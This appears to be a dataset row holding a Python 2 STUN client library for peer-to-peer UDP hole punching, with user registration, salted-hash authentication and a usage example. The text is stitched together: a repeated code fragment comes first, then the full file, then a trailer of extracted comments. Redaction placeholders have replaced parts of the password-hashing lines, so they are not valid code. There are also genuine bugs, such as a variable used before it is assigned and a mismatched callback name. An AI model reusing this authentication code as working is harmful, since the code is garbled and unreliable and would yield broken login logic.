self.stun_send_message("hole_punch_reject %s" % message_body);
elif(message_type == "hole_punch_request_rejected"):
# Deals with requests that fail due to lack of authentication (this client or the target client) or target client doesn't exist.
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
fail_type, target_username, error_message = json.loads(message_body);
if target_username in self.callback_map:
callback_object = self.callback_map[target_username];
callback_object.complete_connection(target_username, False, error_message);
del self.callback_map[target_username];
elif(message_type == "hole_punch_rejected"):
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size = message_data
client_key = "%s-%s-%s" % (target_ip, target_port, username);
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if callback_object != None:
callback_object.complete_connection(client_key, False, "Peer rejected the connection request.");
del self.callback_map[client_key];
elif(message_type == "init_hole_punch"):
try:
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = json.loads(message_body);
if listen_port not in self.used_ports:
self.used_ports.append(listen_port);
# No else. We're just going to hope there's no way for that if to not run, and that we're just being half-assed at feeling paranoid.
# My mind is feeling like it's been twisted into a few knots at this point, to be honest.
Thread(target=self.connect_to_remote_peer, args=(listen_ip, listen_port, peer_ip, peer_port, buffer_size, peer_username)).start();
client_key = "%s_%s_%s" % (peer_ip, peer_port, peer_username)
if peer_username in self._holepunch_status:
self._holepunch_status[peer_username] = True;
if peer_username in self.callback_map:
self.callback_map[client_key] = self.callback_map[peer_username];
del self.callback_map[peer_username]
except Exception as e:
self.log_error(e);
elif(message_type == "auth_keys"):
# message body should be [salt, dynamic_key]
self.auth_keys = json.loads(message_body);
elif(message_type == "auth_response"):
# message body should be [success, username, profile_map, login, error_message]
success, username, profile_map, login, error_message = json.loads(message_body);
self._auth_status = True;
new_auth = not self.authenticated;
if success:
if login:
self.authenticated = True;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if new_auth:
Thread(target=self.maintain_authentication).start();
else:
self.authenticated = False;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if self.auth_callback != None:
self.auth_callback.complete_authentication(success, error_message);
elif(message_type == "registration_key"):
# message body should be "public_key"
self.registration_key = message_body;
elif(message_type == "registration_response"):
# message body should be [success, username, profile_map, error_message]
success, username, profile_map, error_message = json.loads(message_body);
if success:
self.username = username;
self.profile_map = profile_map;
self._registration_status = True;
if self.registration_callback != None:
self.register_callback.complete_registration(success, error_message);
except Exception as exc:
self.log_error(exc, message_object);
time.sleep(self.thread_sleep_duration);
def update_peer_map(self, packet):
username_list = [];
current_username_list = self.peer_map.keys();
for user_block in packet:
peer_username, profile_map = user_block;
valid_username = ((peer_username != None) and (peer_username.replace(" ","").replace("\t","").replace("\n","").replace("\r","") != ""));
if valid_username:
username_list.append(peer_username);
self.peer_map[peer_username] = user_block;
remove_username_list = [];
for username in current_username_list:
if username not in username_list:
remove_username_list.append(username);
for username in remove_username_list:
del self.peer_map[username];
def auto_select_local_endpoint(self):
listen_ip = self.local_ip;
range_count = len(self.available_ports);
for i in range(0, range_count):
x = range_count - (1 + i)
port_range = self.available_ports[x]
port_count = port_range[1] - port_range[0]
for j in range(0, port_count):
port = port_range[1] - j;
if port not in self.used_ports:
return (listen_ip, port);
return None;
def connect_to_peer(self, target_username, buffer_size, callback_object=None, listen_ip = None, listen_port = None):
""" callback_object should have a complete_connection(target, success, error_message) method where success is True or False.
Extract info with:
ip, port, username = target.split("-",2)
Returns False if it fails to send request message (e.g. peer is blocked or connection to server failed.).
"""
local_endpoint_not_specified = ((listen_ip == None) or (listen_port == None))
if local_endpoint_not_specified:
try:
listen_ip, listen_port = self.auto_select_local_endpoint();
except:
callback_object.complete_connection(client_key, False, "All available allowed local ports are already in use. Cannot initiate connection to peer.");
return False;
# Disallow connecting to yourself. What are you trying to pull?
if self.username == target_username:
callback_object.complete_connection(client_key, False, "You cannot connect to yourself.");
return False;
# disallow connecting to blocked peers.
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed([target_username, buffer_size]);
if not peer_allowed:
callback_object.complete_connection(client_key, False, "This peer has been blocked.");
return False;
client_key = target_username;
self.callback_map[client_key] = callback_object;
self._holepunch_status[client_key] = None;
# Start hole_punch process.
message = "request_hole_punch %s" % json.dumps([listen_ip, listen_port, self.username, target_username, buffer_size])
if not self.stun_send_message(message):
callback_object.complete_connection(client_key, False, "Failed to connect to the server.");
del self.callback_map[client_key];
return False;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
Thread(target=self.monitor_response, args=("_holepunch_status", client_key, self.server_response_timeout, None, None, timeout_handler)).start();
return True;
def connect_to_remote_peer(self, local_ip, local_port, target_ip, target_port, buffer_size, username):
"""Warning: Internal use only!"""
print "Connecting to remote peer."
udp_client = udp.UDP_Client(True, local_ip, local_port, target_ip, target_port, buffer_size, True);
client_key = "%s_%s_%s" % (target_ip, target_port, username)
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if self.hole_punch(udp_client, self.hole_punch_max_attempts, self.hole_punch_timeout):
print "Hole-punch succeeded."
if callback_object != None:
callback_object.complete_connection(username, True, client_key);
self.client_map[client_key] = udp_client; # success, add it to the map.
else:
print "Hole-punch failed."
# remove that port from the used ports list.
port_count = len(self.used_ports);
for i in range(0, port_count):
if self.used_ports[i] == local_port:
del self.used_ports[i]
break;
# run the callback, if there is one.
if callback_object != None:
callback_object.complete_connection(client_key, False, "Failed to connect to peer.");
def hole_punch_send_loop(self, udp_client, maximum_retries=20, delay=0.5):
for i in range(0, maximum_retries):
udp_client.send_message("syn", False, False);
time.sleep(delay);
# Create and return a udp socket that has established connection with the target peer, or None if it fails.
def hole_punch(self, udp_client, maximum_retries=20, timeout=20):
print "Performing hole-punch."
delay = 0.5
result = False;
connection_state = self.connection_state
Thread(target=self.hole_punch_send_loop, args=(udp_client, maximum_retries, delay)).start();
start_time = time.time();
for i in range(0, maximum_retries):
time.sleep(delay)
if not connection_state.active:
# give up and close it out.
udp_client.disconnect();
print "Fail 1";
return False;
packet = "";
try:
packet = udp_client.pop_message();
except:
pass;
if packet != None:
print "hole_punch_response: " + str(packet);
if len(packet) >= 3:
# check the packet.
if(packet[2] == "syn"):
udp_client.send_message("ack", False, False); # send acknowledge
elif(packet[2] == "ack"):
udp_client.send_message("ack2", False, False); # send ack ack and return socket.
result = True;
print "Success 1";
break;
elif(packet[2] == "ack2"):
result = True; # ack ack received, return socket.
print "Success 2";
break;
# check for timeout
time_elapsed = time.time() - start_time;
if(time_elapsed >= timeout):
print "Fail 2";
break;
return result;
class KeepAliveMonitor:
def __init__(self, parent):
self.parent = parent;
self.last_reauth_attempt = time.time();
def complete_authentication(self, success, error_message=""):
self.parent.re_auth_ready = True;
self.last_reauth_attempt = time.time();
if not success:
self.parent.auth_keep_alive_multiplier += 1;
def handle_timeout(self, params=None):
self.last_reauth_attempt = time.time();
self.parent.re_auth_ready = True;
self.parent.auth_keep_alive_multiplier += 1;
| import socket
import sys
import traceback
import struct
import threading;
from threading import Thread;
import time;
import datetime;
import json
#import buffered_message;
import hashlib
from Crypto.PublicKey import RSA
from connection_state import ConnectionState
# publickey = RSA.importKey(key_string)
import tcp;
import udp;
# *************
# EXAMPLE USAGE
# *************
'''
import socket
import tcp
import udp
import stun_client
import time
start_listening = True
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 30779
server_ip = socket.gethostbyname(socket.gethostname())
server_port = 30788
socket_timeout = 3.0
peer_block_manager = None
client = stun_client.STUN_Client(start_listening, local_ip, local_port, server_ip, server_port, socket_timeout, peer_block_manager)
# Set your available listening port ranges
client.available_ports = [[35000, 35100], [36500, 36700],]
# Register a user acccount with the stun server.
class RegisterCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Registration request to server has timed-out."
def complete_registration(self, success, error_message=""):
self.success = success
self.error_message = error_message
username = "test_user"
password = "<PASSWORD>"
profile_map = {}
callback_object = RegisterCallback()
registration_type = "permanent"
client.register(username, password, profile_map, callback_object, registration_type)
response_check_interval = 0.5;
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Login with username and password.
class AuthCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Authentication request to server has timed-out."
def complete_authentication(self, success, error_message=""):
self.success = success
self.error_message = error_message
callback_object = AuthCallback()
login = True # this authentication is to login. It'd be False if we wanted to log out.
client.authenticate(username, password, callback_object, login)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Now we can access the list of peers connected to the server.
# Alternatively, assign a function reference to client.peer_map_callback (argument will be a reference to client.peer_map) to be notified of peer list updates as they are received.
#
# sample peer_map:
# ["test_user":["test_user", None], "another_user":["another_user", None],]
# Get a peer from the list.
peer_username = None;
for _username, data in client.peer_map.iteritems():
if username != _username:
peer_username = _username
break
# Connect to that peer (hole-punch)
class ConnectionCallback:
def __init__(self):
self.error_message = ""
self.success = None
self.client_key = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Connection request to server has timed-out."
def complete_connection(self, peer_username, success, error_message=""):
self.success = success
if success:
self.client_key = error_message
else:
self.error_message = error_message
buffer_size = 128
callback_object = ConnectionCallback()
client.connect_to_peer(peer_username, buffer_size, callback_object)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
client_key = callback_object.client_key
udp_client = client.client_map[client_key]
# Now you can communicate with that peer.
udp_client.send_message("Greetings!")
udp_client.pop_all_messages()
'''
class STUN_Client:
def __init__(self,
start_listen_thread=False,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=30779,
server_ip=socket.gethostbyname(socket.gethostname()),
server_port=30788,
socket_timeout=3.0,
peer_block_manager=None):
self.local_ip = local_ip;
self.local_port = local_port;
self.socket_timeout = socket_timeout;
self.peer_block_manager = peer_block_manager;
self.thread_sleep_duration = 0.1;
self.error_log = [];
self.username = None;
self.password = <PASSWORD>;
self.profile_map = {};
self.authenticated = False;
self.auth_callback = None;
self.auth_keys = None;
self.auth_timeout = 15; # 15 seconds is the limit for authentication requests. It's just a magic number like many of these timeout values.
self.last_auth = None;
self.login_expiration = 20; # login will expire after this many seconds passes without successful keep-alive authentication
self.auth_keep_alive_interval = 5;
self.auth_keep_alive_multiplier = 1; # Avoid hammering the server if it's down. Will increment every time re-auth fails, returns to 1 upon successful authentication.
self.re_auth_ready = None;
self.master_log = []; # all messages recieved
self.message_log_map = {}; # log per message type.
# this will handle callbacks for keeping track of whether the user's authentication expires (namely from losing connection to the server.)
self.authentication_monitor_object = None;
self.hole_punch_timeout = 20;
self.hole_punch_max_attempts = 20;
self.server_response_timeout = 20;
# Server response flags. Set to None when sending a request; they are flipped to True upon receiving a response. Used for determining response time-out.
self._auth_status = None;
self._registration_status = None; # Private. Internal use only.
self._holepunch_status = {};
self.available_ports = [[34000, 34100],] # list of ranges, e.g. ports 34000 - 34100
self.used_ports = [];
self.registration_key = None;
self.udp_client_keep_alive_timeout = 30;
# dictionary of active udp connections (hole-punched)
self.client_map = {};
self.callback_map = {};
self.send_queue = [];
self.connection_state = ConnectionState(False);
# Initialize TCP client.
self.init_tcp_client(server_ip, server_port);
self.peer_map = {};
# Start listening to the stun server.
self.init_stun_listener();
self.keep_alive_monitor = KeepAliveMonitor(self);
self.peer_map_callback = None;
def shutdown(self, stun_only=True):
self.authenticated = False;
self.connection_state.active = False; # kills main thread, making the logout auth sequence impossible in its current implementation (get salt/key, then perform request) which needs the main loop.
self.stun_client.disconnect();
if not stun_only:
# disconnect all udp clients...
for key, client in self.client_map.iteritems():
client.disconnect();
self.client_map.clear();
self.peer_map.clear();
del self.used_ports[:]
def restart(self, stun_only=True):
self.shutdown(stun_only);
self.init_tcp_client(self.server_ip, self.server_port);
self.init_stun_listener();
def log_error(self, error_message, extra=None):
err_msg = "[STUN_Server] Line #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info());
timestamp = time.time();
date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
self.error_log.append((timestamp, date_string, err_msg, extra));
def monitor_response(self, target_object, target_key=None, timeout=20, callback=None, callback_params=None, timeout_callback=None, timeout_callback_params=None):
"""Waits until target is no longer null or timeout occurs. Timeout is in seconds. target_object and target_key should be strings.
If target key is not null, then target_object will be treated as a dictionary (using target_key for the index).
This function is best utilized on its own separate thread."""
# Wait until salt and key have been retrieved or timeout occurs.
time_elapsed = 0;
start_time = time.time();
target_attribute = getattr(self, target_object);
target = None;
connection_state = self.connection_state
#print "Monitoring for %s" % target_object;
# Behold, python lambda expressions in the wild!
if target_key == None:
target = lambda parent: getattr(parent, target_object);
else:
target = lambda parent: getattr(parent, target_object)[target_key];
while time_elapsed < timeout:
time_elapsed = time.time() - start_time;
# check for shutdown.
if not connection_state.active:
return;
# check for target condition
if target(self) != None:
break;
time.sleep(self.thread_sleep_duration);
# Check for timeout.
if target(self) == None:
#print "Timeout on %s" % target_object;
has_timeout_callback = timeout_callback != None;
if has_timeout_callback:
if timeout_callback_params != None:
timeout_callback(timeout_callback_params);
else:
timeout_callback();
return;
#else:
# print "No timeout on %s" % target_object;
# Success, run the callback if one was provided (maybe not if one is only concerned with the timeout event).
if callback != None:
if callback_params != None:
callback(target_object, target_key, callback_params);
else:
callback(target_object, target_key);
def authenticate_thread(self, username, password, callback_object=None, login=True):
# callback_object should have a complete_authentication(success, error_message) method.
self.username = username;
self.password = password;
self.auth_callback = callback_object;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Send salt and dynamic key retrieval request.
self.auth_keys = None;
message = "auth_salt_request %s" % username;
if not self.stun_send_message(message):
#callback_object.complete_authentication(False, "Failed to connect to the server.");
if timeout_handler != None:
timeout_handler("Failed to connect to the server.");
return;
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("auth_keys", None, self.server_response_timeout, self.authenticate_send_credentials, [login, callback_object], timeout_handler, "Server failed to respond.");
def authenticate_send_credentials(self, target_object=None, target_key=None, params=None):
callback_object = None;
if params != None:
callback_object = params[1];
login = params[0]
# hash the password
salt, dynamic_key = self.auth_keys;
if not salt:
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
salted_password = <PASSWORD>" % (salt, self.password)
hashed_salted_password = hashlib.<PASSWORD>4(<PASSWORD>).hex<PASSWORD>();
#print "hash1: %s\n" % hashed_salted_password;
key_and_hash = "%s%s" % (dynamic_key, hashed_salted_password)
hashed_password = <PASSWORD>(key_and_hash).<PASSWORD>();
#print "hash2: %s" % hashed_password;
self._auth_status = None;
# Send authentication request.
message = "authenticate %s" % json.dumps([self.username, hashed_password, login, json.dumps(self.available_ports), json.dumps(self.used_ports)]);
if not self.stun_send_message(message):
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
self.monitor_response("_auth_status", None, self.server_response_timeout, None, None, timeout_handler);
def registration_completion_handler(self, target_object, target_key, params):
callback_object = params;
registration_handler = None;
has_registration_handler = ((callback_object != None) and (hasattr(callback_object, "complete_registration")))
if has_registration_handler:
callback_object.complete_registration(True, "");
def send_encrypted_registration_request(self, target_object=None, target_key=None, params=None):
username, password, profile_map, callback_object, registration_type = params;
self._registration_status = None;
# Construct the message.
message = "%s" % json.dumps([username, password, profile_map, registration_type]);
# Encrypt the message.
public_key = RSA.importKey(self.registration_key)
message = public_key.encrypt(message, 32);
# Tack on the username in plain text and json_encode again. The STUN Server needs to username to determine which private key to use to decrypt the message.
message = "register %s %s" % (username, message[0]);
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("_registration_status", None, self.server_response_timeout, self.registration_completion_handler, callback_object, timeout_handler);
def register_thread(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
# callback_object should have a complete_registration(success, error_message) method.
self.username = username;
self.password = password;
self.profile_map = profile_map;
self.register_callback = callback_object;
self.registration_key = None;
message = "register_key %s" % username;
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
params = [username, password, profile_map, callback_object, registration_type];
self.monitor_response("registration_key", None, self.server_response_timeout, self.send_encrypted_registration_request, params, timeout_handler);
def authenticate(self, username, password, callback_object=None, login=True):
"""Non-blocking. Sends a user authentication request."""
# Spawn a separate thread to perform authentication. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.authenticate_thread, args=(username, password, callback_object, login)).start();
def maintain_authentication(self, callback_object=None):
#self.authentication_monitor_object
username = self.username
password = <PASSWORD>
last_auth = self.last_auth
self.re_auth_ready = True;
while self.authenticated:
last_reauth = self.keep_alive_monitor.last_reauth_attempt;
now = time.time();
ready_time = last_reauth + (self.auth_keep_alive_multiplier * self.auth_keep_alive_interval);
time_for_another_reauth_attempt = now >= ready_time;
# By re_auth_ready, I'm saying a re-authentication attempt isn't currently in progress. Yes, it's a poorly named variable.
# I'll need to rename it something better. Maybe later (trademark).
if self.re_auth_ready and time_for_another_reauth_attempt:
self.re_auth_ready = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor);
time.sleep(self.thread_sleep_duration);
def logout(self):
self.authenticated = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor, False);
def register(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
"""Non-blocking. Sends a user registration request.
Only type of registration available for now is 'permanent'. Temporary to come later, maybe (for guests/'unregistered' users).
Note that profile_map should be a json-encoded string (you can store arbitrary data here)."""
# Spawn a separate thread to perform registration. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.register_thread, args=(username, password, profile_map, callback_object, registration_type)).start();
def init_tcp_client(self, server_ip, server_port, buffer_size=1024):
self.server_ip = server_ip;
self.server_port = server_port;
self.stun_client = tcp.TCP_Client(server_ip, server_port, buffer_size);
def init_stun_listener(self):
self.connection_state = ConnectionState(True);
Thread(target=self.stun_listen_loop).start();
def stun_send_message(self, message, json_encode=False, prepare=True):
try:
self.stun_client.send_message(message, json_encode, prepare);
return True;
except:
return False;
def stun_listen_loop(self):
connection_state = self.connection_state
message_object = None
while self.connection_state.active:
try:
message_object = self.stun_client.pop_message();
is_valid_message = ((message_object != None) and (len(message_object) > 2));
self.master_log.append(message_object);
if is_valid_message:
message = message_object[2];
message_type, message_body = message.split(" ",1);
if message_type not in self.message_log_map:
self.message_log_map[message_type] = [];
self.message_log_map[message_type].append(message_object);
#print "MESSAGE: %s\n" % message_object;
if(message_type == "peer_map"):
# peer data should be [[peer_username, public_profile_map], ...]
message_data = json.loads(message_body);
self.update_peer_map(message_data);
if self.peer_map_callback != None:
self.peer_map_callback(self.peer_map);
elif(message_type == "hole_punch"):
peer_allowed = True;
# message body should be [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = message_data
port_in_use = False;
# Ensure port isn't already in use.
if listen_port in self.used_ports:
port_in_use = True;
self.stun_send_message("hole_punch_reject %s" % json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]));
continue;
message_body = json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]);
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed(message_data);
if(peer_allowed):
self.stun_send_message("hole_punch_ack %s" % message_body);
else:
self.stun_send_message("hole_punch_reject %s" % message_body);
elif(message_type == "hole_punch_request_rejected"):
# Deals with requests that fail due to lack of authentication (this client or the target client) or target client doesn't exist.
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
fail_type, target_username, error_message = json.loads(message_body);
if target_username in self.callback_map:
callback_object = self.callback_map[target_username];
callback_object.complete_connection(target_username, False, error_message);
del self.callback_map[target_username];
elif(message_type == "hole_punch_rejected"):
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size = message_data
client_key = "%s-%s-%s" % (target_ip, target_port, username);
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if callback_object != None:
callback_object.complete_connection(client_key, False, "Peer rejected the connection request.");
del self.callback_map[client_key];
elif(message_type == "init_hole_punch"):
try:
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = json.loads(message_body);
if listen_port not in self.used_ports:
self.used_ports.append(listen_port);
# No else. We're just going to hope there's no way for that if to not run, and that we're just being half-assed at feeling paranoid.
# My mind is feeling like it's been twisted into a few knots at this point, to be honest.
Thread(target=self.connect_to_remote_peer, args=(listen_ip, listen_port, peer_ip, peer_port, buffer_size, peer_username)).start();
client_key = "%s_%s_%s" % (peer_ip, peer_port, peer_username)
if peer_username in self._holepunch_status:
self._holepunch_status[peer_username] = True;
if peer_username in self.callback_map:
self.callback_map[client_key] = self.callback_map[peer_username];
del self.callback_map[peer_username]
except Exception as e:
self.log_error(e);
elif(message_type == "auth_keys"):
# message body should be [salt, dynamic_key]
self.auth_keys = json.loads(message_body);
elif(message_type == "auth_response"):
# message body should be [success, username, profile_map, login, error_message]
success, username, profile_map, login, error_message = json.loads(message_body);
self._auth_status = True;
new_auth = not self.authenticated;
if success:
if login:
self.authenticated = True;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if new_auth:
Thread(target=self.maintain_authentication).start();
else:
self.authenticated = False;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if self.auth_callback != None:
self.auth_callback.complete_authentication(success, error_message);
elif(message_type == "registration_key"):
# message body should be "public_key"
self.registration_key = message_body;
elif(message_type == "registration_response"):
# message body should be [success, username, profile_map, error_message]
success, username, profile_map, error_message = json.loads(message_body);
if success:
self.username = username;
self.profile_map = profile_map;
self._registration_status = True;
if self.registration_callback != None:
self.register_callback.complete_registration(success, error_message);
except Exception as exc:
self.log_error(exc, message_object);
time.sleep(self.thread_sleep_duration);
def update_peer_map(self, packet):
username_list = [];
current_username_list = self.peer_map.keys();
for user_block in packet:
peer_username, profile_map = user_block;
valid_username = ((peer_username != None) and (peer_username.replace(" ","").replace("\t","").replace("\n","").replace("\r","") != ""));
if valid_username:
username_list.append(peer_username);
self.peer_map[peer_username] = user_block;
remove_username_list = [];
for username in current_username_list:
if username not in username_list:
remove_username_list.append(username);
for username in remove_username_list:
del self.peer_map[username];
def auto_select_local_endpoint(self):
listen_ip = self.local_ip;
range_count = len(self.available_ports);
for i in range(0, range_count):
x = range_count - (1 + i)
port_range = self.available_ports[x]
port_count = port_range[1] - port_range[0]
for j in range(0, port_count):
port = port_range[1] - j;
if port not in self.used_ports:
return (listen_ip, port);
return None;
def connect_to_peer(self, target_username, buffer_size, callback_object=None, listen_ip = None, listen_port = None):
""" callback_object should have a complete_connection(target, success, error_message) method where success is True or False.
Extract info with:
ip, port, username = target.split("-",2)
Returns False if it fails to send request message (e.g. peer is blocked or connection to server failed.).
"""
local_endpoint_not_specified = ((listen_ip == None) or (listen_port == None))
if local_endpoint_not_specified:
try:
listen_ip, listen_port = self.auto_select_local_endpoint();
except:
callback_object.complete_connection(client_key, False, "All available allowed local ports are already in use. Cannot initiate connection to peer.");
return False;
# Disallow connecting to yourself. What are you trying to pull?
if self.username == target_username:
callback_object.complete_connection(client_key, False, "You cannot connect to yourself.");
return False;
# disallow connecting to blocked peers.
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed([target_username, buffer_size]);
if not peer_allowed:
callback_object.complete_connection(client_key, False, "This peer has been blocked.");
return False;
client_key = target_username;
self.callback_map[client_key] = callback_object;
self._holepunch_status[client_key] = None;
# Start hole_punch process.
message = "request_hole_punch %s" % json.dumps([listen_ip, listen_port, self.username, target_username, buffer_size])
if not self.stun_send_message(message):
callback_object.complete_connection(client_key, False, "Failed to connect to the server.");
del self.callback_map[client_key];
return False;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
Thread(target=self.monitor_response, args=("_holepunch_status", client_key, self.server_response_timeout, None, None, timeout_handler)).start();
return True;
def connect_to_remote_peer(self, local_ip, local_port, target_ip, target_port, buffer_size, username):
"""Warning: Internal use only!"""
print "Connecting to remote peer."
udp_client = udp.UDP_Client(True, local_ip, local_port, target_ip, target_port, buffer_size, True);
client_key = "%s_%s_%s" % (target_ip, target_port, username)
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if self.hole_punch(udp_client, self.hole_punch_max_attempts, self.hole_punch_timeout):
print "Hole-punch succeeded."
if callback_object != None:
callback_object.complete_connection(username, True, client_key);
self.client_map[client_key] = udp_client; # success, add it to the map.
else:
print "Hole-punch failed."
# remove that port from the used ports list.
port_count = len(self.used_ports);
for i in range(0, port_count):
if self.used_ports[i] == local_port:
del self.used_ports[i]
break;
# run the callback, if there is one.
if callback_object != None:
callback_object.complete_connection(client_key, False, "Failed to connect to peer.");
def hole_punch_send_loop(self, udp_client, maximum_retries=20, delay=0.5):
for i in range(0, maximum_retries):
udp_client.send_message("syn", False, False);
time.sleep(delay);
# Create and return a udp socket that has established connection with the target peer, or None if it fails.
def hole_punch(self, udp_client, maximum_retries=20, timeout=20):
print "Performing hole-punch."
delay = 0.5
result = False;
connection_state = self.connection_state
Thread(target=self.hole_punch_send_loop, args=(udp_client, maximum_retries, delay)).start();
start_time = time.time();
for i in range(0, maximum_retries):
time.sleep(delay)
if not connection_state.active:
# give up and close it out.
udp_client.disconnect();
print "Fail 1";
return False;
packet = "";
try:
packet = udp_client.pop_message();
except:
pass;
if packet != None:
print "hole_punch_response: " + str(packet);
if len(packet) >= 3:
# check the packet.
if(packet[2] == "syn"):
udp_client.send_message("ack", False, False); # send acknowledge
elif(packet[2] == "ack"):
udp_client.send_message("ack2", False, False); # send ack ack and return socket.
result = True;
print "Success 1";
break;
elif(packet[2] == "ack2"):
result = True; # ack ack received, return socket.
print "Success 2";
break;
# check for timeout
time_elapsed = time.time() - start_time;
if(time_elapsed >= timeout):
print "Fail 2";
break;
return result;
class KeepAliveMonitor:
def __init__(self, parent):
self.parent = parent;
self.last_reauth_attempt = time.time();
def complete_authentication(self, success, error_message=""):
self.parent.re_auth_ready = True;
self.last_reauth_attempt = time.time();
if not success:
self.parent.auth_keep_alive_multiplier += 1;
def handle_timeout(self, params=None):
self.last_reauth_attempt = time.time();
self.parent.re_auth_ready = True;
self.parent.auth_keep_alive_multiplier += 1; | en | 0.722216 | #import buffered_message; # publickey = RSA.importKey(key_string) # ************* # EXAMPLE USAGE # ************* import socket import tcp import udp import stun_client import time start_listening = True local_ip = socket.gethostbyname(socket.gethostname()) local_port = 30779 server_ip = socket.gethostbyname(socket.gethostname()) server_port = 30788 socket_timeout = 3.0 peer_block_manager = None client = stun_client.STUN_Client(start_listening, local_ip, local_port, server_ip, server_port, socket_timeout, peer_block_manager) # Set your available listening port ranges client.available_ports = [[35000, 35100], [36500, 36700],] # Register a user acccount with the stun server. class RegisterCallback: def __init__(self): self.error_message = "" self.success = None def handle_timeout(self, params=None): self.success = False self.error_message = "Registration request to server has timed-out." def complete_registration(self, success, error_message=""): self.success = success self.error_message = error_message username = "test_user" password = "<PASSWORD>" profile_map = {} callback_object = RegisterCallback() registration_type = "permanent" client.register(username, password, profile_map, callback_object, registration_type) response_check_interval = 0.5; while callback_object.success == None: time.sleep(response_check_interval) if not callback_object.success: print "Error: %s" % callback_object.error_message exit() # Login with username and password. class AuthCallback: def __init__(self): self.error_message = "" self.success = None def handle_timeout(self, params=None): self.success = False self.error_message = "Authentication request to server has timed-out." def complete_authentication(self, success, error_message=""): self.success = success self.error_message = error_message callback_object = AuthCallback() login = True # this authentication is to login. It'd be False if we wanted to log out. client.authenticate(username, password, callback_object, login) while callback_object.success == None: time.sleep(response_check_interval) if not callback_object.success: print "Error: %s" % callback_object.error_message exit() # Now we can access the list of peers connected to the server. # Alternatively, assign a function reference to client.peer_map_callback (argument will be a reference to client.peer_map) to be notified of peer list updates as they are received. # # sample peer_map: # ["test_user":["test_user", None], "another_user":["another_user", None],] # Get a peer from the list. peer_username = None; for _username, data in client.peer_map.iteritems(): if username != _username: peer_username = _username break # Connect to that peer (hole-punch) class ConnectionCallback: def __init__(self): self.error_message = "" self.success = None self.client_key = None def handle_timeout(self, params=None): self.success = False self.error_message = "Connection request to server has timed-out." def complete_connection(self, peer_username, success, error_message=""): self.success = success if success: self.client_key = error_message else: self.error_message = 